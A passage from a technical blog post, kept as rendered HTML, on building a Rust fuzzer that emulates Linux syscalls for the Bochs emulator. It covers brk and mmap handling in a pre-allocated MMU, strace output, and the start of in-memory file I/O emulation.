            <span class="nn">libc</span><span class="p">::</span><span class="nf">mmap</span><span class="p">(</span>
                <span class="n">addr</span><span class="p">,</span>
                <span class="n">length</span><span class="p">,</span>
                <span class="n">prot</span><span class="p">,</span>
                <span class="n">flags</span><span class="p">,</span>
                <span class="n">fd</span><span class="p">,</span>
                <span class="n">offset</span>
            <span class="p">)</span>
        <span class="p">};</span>

        <span class="k">if</span> <span class="n">result</span> <span class="o">==</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_FAILED</span> <span class="p">{</span>
            <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"Failed `mmap` memory for MMU"</span><span class="p">));</span>
        <span class="p">}</span>

        <span class="c1">// Create MMU</span>
        <span class="nf">Ok</span><span class="p">(</span><span class="n">Mmu</span> <span class="p">{</span>
            <span class="n">brk_base</span><span class="p">:</span> <span class="n">result</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
            <span class="n">brk_size</span><span class="p">:</span> <span class="n">DEFAULT_BRK_SIZE</span><span class="p">,</span>
            <span class="n">curr_brk</span><span class="p">:</span> <span class="n">result</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
            <span class="n">mmap_base</span><span class="p">:</span> <span class="n">result</span> <span class="k">as</span> <span class="nb">usize</span> <span class="o">+</span> <span class="n">DEFAULT_BRK_SIZE</span><span class="p">,</span>
            <span class="n">mmap_size</span><span class="p">:</span> <span class="n">DEFAULT_MMAP_SIZE</span><span class="p">,</span>
            <span class="n">curr_mmap</span><span class="p">:</span> <span class="n">result</span> <span class="k">as</span> <span class="nb">usize</span> <span class="o">+</span> <span class="n">DEFAULT_BRK_SIZE</span><span class="p">,</span>
            <span class="n">next_mmap</span><span class="p">:</span> <span class="n">result</span> <span class="k">as</span> <span class="nb">usize</span> <span class="o">+</span> <span class="n">DEFAULT_BRK_SIZE</span><span class="p">,</span>
        <span class="p">})</span>
    <span class="p">}</span>
</code></pre></div></div>
<p>Handling memory-management syscalls actually wasn’t too difficult, there were some gotcha’s early on but we managed to get something working fairly quickly.</p>

<h2 id="handling-brk">Handling <code class="language-plaintext highlighter-rouge">brk</code></h2>
<p><a href="https://linux.die.net/man/2/brk">brk</a> is a syscall used to increase the size of the data segment in your program. So a typical pattern you’ll see is that the program will call <code class="language-plaintext highlighter-rouge">brk(0)</code>, which will return the current program break address, and then if the program wants 2 pages of extra memory, it will then call <code class="language-plaintext highlighter-rouge">brk(base + 0x2000)</code>, and you can see that in the Bochs <code class="language-plaintext highlighter-rouge">strace</code> output:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">[devbox:~/bochs/bochs-2.7]$</span><span class="w"> </span>strace ./bochs
<span class="go">execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0)         = 289704
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000
</span></code></pre></div></div>

<p>So in our syscall handler, I have the following logic for <code class="language-plaintext highlighter-rouge">brk</code>:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// brk</span>
        <span class="mi">0xC</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Try to update the program break</span>
            <span class="k">if</span> <span class="n">context</span><span class="py">.mmu</span><span class="nf">.update_brk</span><span class="p">(</span><span class="n">a1</span><span class="p">)</span><span class="nf">.is_err</span><span class="p">()</span> <span class="p">{</span>
                <span class="nd">fault!</span><span class="p">(</span><span class="n">contextp</span><span class="p">,</span> <span class="nn">Fault</span><span class="p">::</span><span class="n">InvalidBrk</span><span class="p">);</span>
            <span class="p">}</span>

            <span class="c1">// Return the program break</span>
            <span class="n">context</span><span class="py">.mmu.curr_brk</span> <span class="k">as</span> <span class="nb">u64</span>
        <span class="p">},</span>
</code></pre></div></div>

<p>This is effectively a wrapper around the <code class="language-plaintext highlighter-rouge">update_brk</code> method we’ve implemented for <code class="language-plaintext highlighter-rouge">Mmu</code>, so let’s look at that:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Logic for handling a `brk` syscall</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">update_brk</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span> <span class="n">addr</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="p">(),</span> <span class="p">()</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="c1">// If addr is NULL, just return nothing to do</span>
        <span class="k">if</span> <span class="n">addr</span> <span class="o">==</span> <span class="mi">0</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Ok</span><span class="p">(());</span> <span class="p">}</span>

        <span class="c1">// Check to see that the new address is in a valid range</span>
        <span class="k">let</span> <span class="n">limit</span> <span class="o">=</span> <span class="k">self</span><span class="py">.brk_base</span> <span class="o">+</span> <span class="k">self</span><span class="py">.brk_size</span><span class="p">;</span>
        <span class="k">if</span> <span class="o">!</span><span class="p">(</span><span class="k">self</span><span class="py">.curr_brk</span><span class="o">..</span><span class="n">limit</span><span class="p">)</span><span class="nf">.contains</span><span class="p">(</span><span class="o">&amp;</span><span class="n">addr</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(());</span> <span class="p">}</span>

        <span class="c1">// So we have a valid program break address, update the current break</span>
        <span class="k">self</span><span class="py">.curr_brk</span> <span class="o">=</span> <span class="n">addr</span><span class="p">;</span>

        <span class="nf">Ok</span><span class="p">(())</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>So if we get a NULL argument in <code class="language-plaintext highlighter-rouge">a1</code>, we have nothing to do, nothing in the current MMU state needs adjusting, we just simply return the current program break. If we get a non-NULL argument, we do a sanity check to make sure that our pool of <code class="language-plaintext highlighter-rouge">brk</code> memory is large enough to accomodate the request and if it is, we adjust the current program break and return that to the caller.</p>

<p>Remember, this is so simple because we’ve already pre-allocated all of the memory, so we don’t need to actually do much here besides adjust what amounts to an offset indicating what memory is valid.</p>

<h2 id="handling-mmap-and-munmap">Handling <code class="language-plaintext highlighter-rouge">mmap</code> and <code class="language-plaintext highlighter-rouge">munmap</code></h2>
<p><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">mmap</a> is a bit more involved, but still easy to track through. For <code class="language-plaintext highlighter-rouge">mmap</code> calls, theres more state we need to track because there are essentially “allocations” taking place that we need to keep in mind. Most <code class="language-plaintext highlighter-rouge">mmap</code> calls will have a NULL argument for address because they don’t care where the memory mapping takes place in virtual memory, in that case, we default to our main method <code class="language-plaintext highlighter-rouge">do_mmap</code> that we’ve implemented for <code class="language-plaintext highlighter-rouge">Mmu</code>:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// If a1 is NULL, we just do a normal mmap</span>
            <span class="k">if</span> <span class="n">a1</span> <span class="o">==</span> <span class="mi">0</span> <span class="p">{</span>
                <span class="k">if</span> <span class="n">context</span><span class="py">.mmu</span><span class="nf">.do_mmap</span><span class="p">(</span><span class="n">a2</span><span class="p">,</span> <span class="n">a3</span><span class="p">,</span> <span class="n">a4</span><span class="p">,</span> <span class="n">a5</span><span class="p">,</span> <span class="n">a6</span><span class="p">)</span><span class="nf">.is_err</span><span class="p">()</span> <span class="p">{</span>
                    <span class="nd">fault!</span><span class="p">(</span><span class="n">contextp</span><span class="p">,</span> <span class="nn">Fault</span><span class="p">::</span><span class="n">InvalidMmap</span><span class="p">);</span>
                <span class="p">}</span>

                <span class="c1">// Succesful regular mmap</span>
                <span class="k">return</span> <span class="n">context</span><span class="py">.mmu.curr_mmap</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>
            <span class="p">}</span>
</code></pre></div></div>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Logic for handling a `mmap` syscall with no fixed address support</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">do_mmap</span><span class="p">(</span>
        <span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span>
        <span class="n">len</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>
        <span class="n">prot</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>
        <span class="n">flags</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>
        <span class="n">fd</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>
        <span class="n">offset</span><span class="p">:</span> <span class="nb">usize</span>
    <span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="p">(),</span> <span class="p">()</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="c1">// Page-align the len</span>
        <span class="k">let</span> <span class="n">len</span> <span class="o">=</span> <span class="p">(</span><span class="n">len</span> <span class="o">+</span> <span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">&amp;</span> <span class="o">!</span><span class="p">(</span><span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">);</span>

        <span class="c1">// Make sure we have capacity left to satisfy this request</span>
        <span class="k">if</span> <span class="n">len</span> <span class="o">+</span> <span class="k">self</span><span class="py">.next_mmap</span> <span class="o">&gt;</span> <span class="k">self</span><span class="py">.mmap_base</span> <span class="o">+</span> <span class="k">self</span><span class="py">.mmap_size</span> <span class="p">{</span> 
            <span class="k">return</span> <span class="nf">Err</span><span class="p">(());</span>
        <span class="p">}</span>

        <span class="c1">// Sanity-check that we don't have any weird `mmap` arguments</span>
        <span class="k">if</span> <span class="n">prot</span> <span class="k">as</span> <span class="nb">i32</span> <span class="o">!=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_READ</span> <span class="p">|</span> <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_WRITE</span> <span class="p">{</span>
            <span class="k">return</span> <span class="nf">Err</span><span class="p">(())</span>
        <span class="p">}</span>

        <span class="k">if</span> <span class="n">flags</span> <span class="k">as</span> <span class="nb">i32</span> <span class="o">!=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_PRIVATE</span> <span class="p">|</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_ANONYMOUS</span> <span class="p">{</span>
            <span class="k">return</span> <span class="nf">Err</span><span class="p">(())</span>
        <span class="p">}</span>

        <span class="k">if</span> <span class="n">fd</span> <span class="k">as</span> <span class="nb">i64</span> <span class="o">!=</span> <span class="o">-</span><span class="mi">1</span> <span class="p">{</span>
            <span class="k">return</span> <span class="nf">Err</span><span class="p">(())</span>
        <span class="p">}</span>

        <span class="k">if</span> <span class="n">offset</span> <span class="o">!=</span> <span class="mi">0</span> <span class="p">{</span>
            <span class="k">return</span> <span class="nf">Err</span><span class="p">(())</span>
        <span class="p">}</span>

        <span class="c1">// Set current to next, and set next to current + len</span>
        <span class="k">self</span><span class="py">.curr_mmap</span> <span class="o">=</span> <span class="k">self</span><span class="py">.next_mmap</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.next_mmap</span> <span class="o">=</span> <span class="k">self</span><span class="py">.curr_mmap</span> <span class="o">+</span> <span class="n">len</span><span class="p">;</span>

        <span class="c1">// curr_mmap now represents the base of the new requested allocation</span>
        <span class="nf">Ok</span><span class="p">(())</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>Very simply, we do some sanity checks to make sure we have enough capacity to satisfy the allocation in our <code class="language-plaintext highlighter-rouge">mmap</code> memory pool, we check to make sure the other arguments are what we’re anticipating, and then we simply update the current offset and the next offset. This way we know next time where to allocate from while also being able to return the current allocation base back to the caller.</p>

<p>There is also a case where <code class="language-plaintext highlighter-rouge">mmap</code> will be called with a non-NULL address and <code class="language-plaintext highlighter-rouge">MAP_FIXED</code> flags meaning that the address matters to the caller and the mapping should take place at the provided virtual address. Right now, this occurs early on in the Bochs process:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">[devbox:~/bochs/bochs-2.7]$</span><span class="w"> </span>strace ./bochs
<span class="go">execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0)         = 289704
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000
</span></code></pre></div></div>

<p>For this special case, there is really nothing for us to do since that address is in the <code class="language-plaintext highlighter-rouge">brk</code> pool. We already know about that memory, we’ve already created it, so this last <code class="language-plaintext highlighter-rouge">mmap</code> call you see above amounts to a NOP for us, there is nothing to do but return the address back to the caller.</p>

<p>At this time, we don’t support <code class="language-plaintext highlighter-rouge">MAP_FIXED</code> calls for non-brk pool memory.</p>

<p>For <code class="language-plaintext highlighter-rouge">munmap</code>, we also treat this operation as a NOP and return success to the user because we’re not concerned with freeing or re-using memory at this time.</p>

<p>You can see that Bochs does quite a bit of <code class="language-plaintext highlighter-rouge">brk</code> and <code class="language-plaintext highlighter-rouge">mmap</code> calls and our fuzzer is now capable of handling them all via our MMU:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">...
</span><span class="go">brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bde000
mmap(NULL, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bda000
mmap(NULL, 4194324, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd06f7ff000
mmap(NULL, 73728, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbe000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbd000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbc000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
munmap(0x7fd071bbb000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bba000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb9000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb8000
brk(0x555555d7f000)                     = 0x555555d7f000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
munmap(0x7fd071bb5000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb0000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baf000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bad000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bab000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baa000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
munmap(0x7fd071ba5000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba3000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9e000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9d000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9b000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
munmap(0x7fd071b99000, 8192)            = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b97000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b96000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000
munmap(0x7fd071b94000, 8192)            = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000
</span><span class="c">...
</span></code></pre></div></div>

<h2 id="file-io">File I/O</h2>
<p>With the MMU out of the way, we needed a way to do file input and output. Bochs is trying to open its configuration file:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">open(".bochsrc", O_RDONLY|O_LARGEFILE)  = 3
close(3)                                = 0
writev(2, [{iov_base="00000000000i[      ] ", iov_len=21}, {iov_base=NULL, iov_len=0}], 200000000000i[      ] ) = 21
writev(2, [{iov_base="reading configuration from .boch"..., iov_len=36}, {iov_base=NULL, iov_len=0}], 2reading configuration from .bochsrc
) = 36
open(".bochsrc", O_RDONLY|O_LARGEFILE)  = 3
</span><span class="gp">read(3, "#</span><span class="w"> </span>You may now use double quotes <span class="s2">"..., 1024) = 1024
</span><span class="go">read(3, "================================"..., 1024) = 1024
</span><span class="gp">read(3, "ig_interface: win32config\n#</span>confi<span class="s2">"..., 1024) = 1024
</span><span class="go">read(3, "ace to AT&amp;T's VNC viewer, cross "..., 1024) = 1024
</span></code></pre></div></div>

<p>The way I’ve approached this for now is to pre-read and store the contents of required files in memory when I initialize the Bochs execution context. This has some advantages, because I can imagine a future when we’re fuzzing something and Bochs needs to do file I/O on a disk image file or something else, and it’d be nice to just already have that file read into memory and waiting for usage. Emulating the file I/O syscalls then becomes very straightforward, we really only need to keep a few metadata and the file contents themselves:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">#[derive(Clone)]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">FileTable</span> <span class="p">{</span>
    <span class="n">files</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">File</span><span class="o">&gt;</span><span class="p">,</span>
<span class="p">}</span>

<span class="k">impl</span> <span class="n">FileTable</span> <span class="p">{</span>
    <span class="c1">// We will attempt to open and read all of our required files ahead of time</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">new</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="k">Self</span><span class="p">,</span> <span class="n">LucidErr</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="c1">// Retrieve .bochsrc</span>
        <span class="k">let</span> <span class="n">args</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="nb">String</span><span class="o">&gt;</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">env</span><span class="p">::</span><span class="nf">args</span><span class="p">()</span><span class="nf">.collect</span><span class="p">();</span>

        <span class="c1">// Check to see if we have a "--bochsrc-path" argument</span>
        <span class="k">if</span> <span class="n">args</span><span class="nf">.len</span><span class="p">()</span> <span class="o">&lt;</span> <span class="mi">3</span> <span class="p">||</span> <span class="o">!</span><span class="n">args</span><span class="nf">.contains</span><span class="p">(</span><span class="o">&amp;</span><span class="s">"--bochsrc-path"</span><span class="nf">.to_string</span><span class="p">())</span> <span class="p">{</span>
            <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"No `--bochsrc-path` argument"</span><span class="p">));</span>
        <span class="p">}</span>

        <span class="c1">// Search for the value</span>
        <span class="k">let</span> <span class="k">mut</span> <span class="n">bochsrc</span> <span class="o">=</span> <span class="nb">None</span><span class="p">;</span>
        <span class="k">for</span> <span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">arg</span><span class="p">)</span> <span class="k">in</span> <span class="n">args</span><span class="nf">.iter</span><span class="p">()</span><span class="nf">.enumerate</span><span class="p">()</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">arg</span> <span class="o">==</span> <span class="s">"--bochsrc-path"</span> <span class="p">{</span>
                <span class="k">if</span> <span class="n">i</span> <span class="o">&gt;=</span> <span class="n">args</span><span class="nf">.len</span><span class="p">()</span> <span class="o">-</span> <span class="mi">1</span> <span class="p">{</span>
                    <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span>
                        <span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"Invalid `--bochsrc-path` value"</span><span class="p">));</span>
                <span class="p">}</span>
            
                <span class="n">bochsrc</span> <span class="o">=</span> <span class="nf">Some</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span><span class="nf">.clone</span><span class="p">());</span>
                <span class="k">break</span><span class="p">;</span>
            <span class="p">}</span>
        <span class="p">}</span>

        <span class="k">if</span> <span class="n">bochsrc</span><span class="nf">.is_none</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span>
            <span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"No `--bochsrc-path` value provided"</span><span class="p">));</span> <span class="p">}</span>
        <span class="k">let</span> <span class="n">bochsrc</span> <span class="o">=</span> <span class="n">bochsrc</span><span class="nf">.unwrap</span><span class="p">();</span>

        <span class="c1">// Try to read the file</span>
        <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="o">=</span> <span class="nf">read</span><span class="p">(</span><span class="o">&amp;</span><span class="n">bochsrc</span><span class="p">)</span> <span class="k">else</span> <span class="p">{</span> 
            <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span>
                <span class="o">&amp;</span><span class="nd">format!</span><span class="p">(</span><span class="s">"Unable to read data BLEGH from '{}'"</span><span class="p">,</span> <span class="n">bochsrc</span><span class="p">)));</span>
        <span class="p">};</span>

        <span class="c1">// Create a file now for .bochsrc</span>
        <span class="k">let</span> <span class="n">bochsrc_file</span> <span class="o">=</span> <span class="n">File</span> <span class="p">{</span>
            <span class="n">fd</span><span class="p">:</span> <span class="mi">3</span><span class="p">,</span>
            <span class="n">path</span><span class="p">:</span> <span class="s">".bochsrc"</span><span class="nf">.to_string</span><span class="p">(),</span>
            <span class="n">contents</span><span class="p">:</span> <span class="n">data</span><span class="nf">.clone</span><span class="p">(),</span>
            <span class="n">cursor</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
        <span class="p">};</span>

        <span class="c1">// Insert the file into the FileTable</span>
        <span class="nf">Ok</span><span class="p">(</span><span class="n">FileTable</span> <span class="p">{</span>
            <span class="n">files</span><span class="p">:</span> <span class="nd">vec!</span><span class="p">[</span><span class="n">bochsrc_file</span><span class="p">],</span>
        <span class="p">})</span>
    <span class="p">}</span>

    <span class="c1">// Attempt to open a file</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">open</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span> <span class="n">path</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="nb">i32</span><span class="p">,</span> <span class="p">()</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="c1">// Try to find the requested path</span>
        <span class="k">for</span> <span class="n">file</span> <span class="k">in</span> <span class="k">self</span><span class="py">.files</span><span class="nf">.iter</span><span class="p">()</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">file</span><span class="py">.path</span> <span class="o">==</span> <span class="n">path</span> <span class="p">{</span>
                <span class="k">return</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">file</span><span class="py">.fd</span><span class="p">);</span>
            <span class="p">}</span>
        <span class="p">}</span>

        <span class="c1">// We didn't find the file, this really should never happen?</span>
        <span class="nf">Err</span><span class="p">(())</span>
    <span class="p">}</span>

    <span class="c1">// Look a file up by fd and then return a mutable reference to it</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">get_file</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span> <span class="n">fd</span><span class="p">:</span> <span class="nb">i32</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Option</span><span class="o">&lt;&amp;</span><span class="k">mut</span> <span class="n">File</span><span class="o">&gt;</span> <span class="p">{</span>
